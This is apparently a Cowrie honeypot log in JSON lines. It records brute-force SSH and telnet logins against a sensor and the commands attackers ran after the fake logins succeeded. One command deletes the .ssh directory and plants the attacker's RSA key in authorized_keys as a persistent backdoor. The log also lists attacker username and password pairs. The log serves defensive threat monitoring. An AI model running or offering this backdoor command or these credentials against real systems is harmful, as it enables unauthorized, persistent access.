{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:47.893738Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41654,"dst_ip":"1.2.3.4","dst_port":22,"session":"caba6f29048c","protocol":"ssh","message":"New connection: 212.227.235.229:41654 (1.2.3.4:22) [session: caba6f29048c]","sensor":"my-vps","timestamp":"2025-09-08T23:22:48.218609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:22:48.219481Z","src_ip":"212.227.235.229","session":"caba6f29048c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:22:48.533554Z","src_ip":"212.227.235.229","session":"caba6f29048c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:22:49.835834Z","src_ip":"212.227.235.229","session":"caba6f29048c"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:51.468544Z","src_ip":"212.227.235.229","session":"caba6f29048c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41662,"dst_ip":"1.2.3.4","dst_port":22,"session":"f73907f343a4","protocol":"ssh","message":"New connection: 212.227.235.229:41662 (1.2.3.4:22) [session: f73907f343a4]","sensor":"my-vps","timestamp":"2025-09-08T23:22:51.764365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:22:51.765523Z","src_ip":"212.227.235.229","session":"f73907f343a4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:22:52.065284Z","src_ip":"212.227.235.229","session":"f73907f343a4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:22:53.583243Z","src_ip":"212.227.235.229","session":"f73907f343a4"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:53.886389Z","src_ip":"212.227.235.229","session":"a0792fa05c45"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:22:53.889174Z","src_ip":"212.227.235.229","session":"f73907f343a4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.83.136","src_port":44002,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a052511fe84","protocol":"ssh","message":"New connection: 196.251.83.136:44002 (1.2.3.4:22) [session: 4a052511fe84]","sensor":"my-vps","timestamp":"2025-09-08T23:23:11.209628Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:23:11.229796Z","src_ip":"196.251.83.136","session":"4a052511fe84"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":59310,"dst_ip":"1.2.3.4","dst_port":23,"session":"a8ceb6e24af7","protocol":"telnet","message":"New connection: 79.124.8.120:59310 (1.2.3.4:23) [session: a8ceb6e24af7]","sensor":"my-vps","timestamp":"2025-09-08T23:23:39.564120Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:23:39.605811Z","src_ip":"79.124.8.120","session":"a8ceb6e24af7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:23:39.654938Z","src_ip":"79.124.8.120","session":"a8ceb6e24af7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41738,"dst_ip":"1.2.3.4","dst_port":22,"session":"62e02a85c2ab","protocol":"ssh","message":"New connection: 212.227.235.229:41738 (1.2.3.4:22) [session: 62e02a85c2ab]","sensor":"my-vps","timestamp":"2025-09-08T23:23:44.311828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:23:44.312728Z","src_ip":"212.227.235.229","session":"62e02a85c2ab"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:23:44.414435Z","src_ip":"212.227.235.229","session":"62e02a85c2ab"}
{"eventid":"cowrie.login.failed","username":"a","password":"123","message":"login attempt [a/123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:23:44.836795Z","src_ip":"212.227.235.229","session":"62e02a85c2ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49702,"dst_ip":"1.2.3.4","dst_port":22,"session":"518209cab0d5","protocol":"ssh","message":"New connection: 212.227.235.229:49702 (1.2.3.4:22) [session: 518209cab0d5]","sensor":"my-vps","timestamp":"2025-09-08T23:23:44.963650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:23:44.964473Z","src_ip":"212.227.235.229","session":"518209cab0d5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:23:45.094968Z","src_ip":"212.227.235.229","session":"518209cab0d5"}
{"eventid":"cowrie.login.failed","username":"localhost","password":"12345","message":"login attempt [localhost/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T23:23:45.672054Z","src_ip":"212.227.235.229","session":"518209cab0d5"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:23:45.933964Z","src_ip":"212.227.235.229","session":"62e02a85c2ab"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:23:46.806344Z","src_ip":"212.227.235.229","session":"518209cab0d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38364,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9bfe9e62d49","protocol":"ssh","message":"New connection: 212.227.235.229:38364 (1.2.3.4:22) [session: f9bfe9e62d49]","sensor":"my-vps","timestamp":"2025-09-08T23:24:11.776564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:24:11.778517Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:24:12.093299Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.login.success","username":"root","password":"a1","message":"login attempt [root/a1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:24:13.407734Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:24:14.043799Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:24:14.044502Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:24:14.045494Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:24:14.357598Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:24:15.350449Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:24:15.351166Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:24:15.663597Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:24:15.664638Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33868,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fdcc86ca748","protocol":"ssh","message":"New connection: 212.227.235.229:33868 (1.2.3.4:22) [session: 6fdcc86ca748]","sensor":"my-vps","timestamp":"2025-09-08T23:24:15.976202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:24:15.976791Z","src_ip":"212.227.235.229","session":"6fdcc86ca748"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:24:16.282189Z","src_ip":"212.227.235.229","session":"6fdcc86ca748"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:24:17.840467Z","src_ip":"212.227.235.229","session":"6fdcc86ca748"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:24:19.179806Z","src_ip":"212.227.235.229","session":"6fdcc86ca748"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33876,"dst_ip":"1.2.3.4","dst_port":22,"session":"385d4eb42af6","protocol":"ssh","message":"New connection: 212.227.235.229:33876 (1.2.3.4:22) [session: 385d4eb42af6]","sensor":"my-vps","timestamp":"2025-09-08T23:24:19.496195Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:24:19.497276Z","src_ip":"212.227.235.229","session":"385d4eb42af6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:24:19.812661Z","src_ip":"212.227.235.229","session":"385d4eb42af6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:24:21.115855Z","src_ip":"212.227.235.229","session":"385d4eb42af6"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:24:21.428124Z","src_ip":"212.227.235.229","session":"f9bfe9e62d49"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:24:21.432778Z","src_ip":"212.227.235.229","session":"385d4eb42af6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40686,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d57c43a70a6","protocol":"ssh","message":"New connection: 212.227.235.229:40686 (1.2.3.4:22) [session: 7d57c43a70a6]","sensor":"my-vps","timestamp":"2025-09-08T23:24:43.990651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:24:43.992033Z","src_ip":"212.227.235.229","session":"7d57c43a70a6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:24:44.087071Z","src_ip":"212.227.235.229","session":"7d57c43a70a6"}
{"eventid":"cowrie.login.failed","username":"public","password":"pass","message":"login attempt [public/pass] failed","sensor":"my-vps","timestamp":"2025-09-08T23:24:44.511438Z","src_ip":"212.227.235.229","session":"7d57c43a70a6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:24:45.608618Z","src_ip":"212.227.235.229","session":"7d57c43a70a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51178,"dst_ip":"1.2.3.4","dst_port":22,"session":"140d99a2babb","protocol":"ssh","message":"New connection: 212.227.235.229:51178 (1.2.3.4:22) [session: 140d99a2babb]","sensor":"my-vps","timestamp":"2025-09-08T23:24:56.833497Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:24:56.839092Z","src_ip":"212.227.235.229","session":"140d99a2babb"}
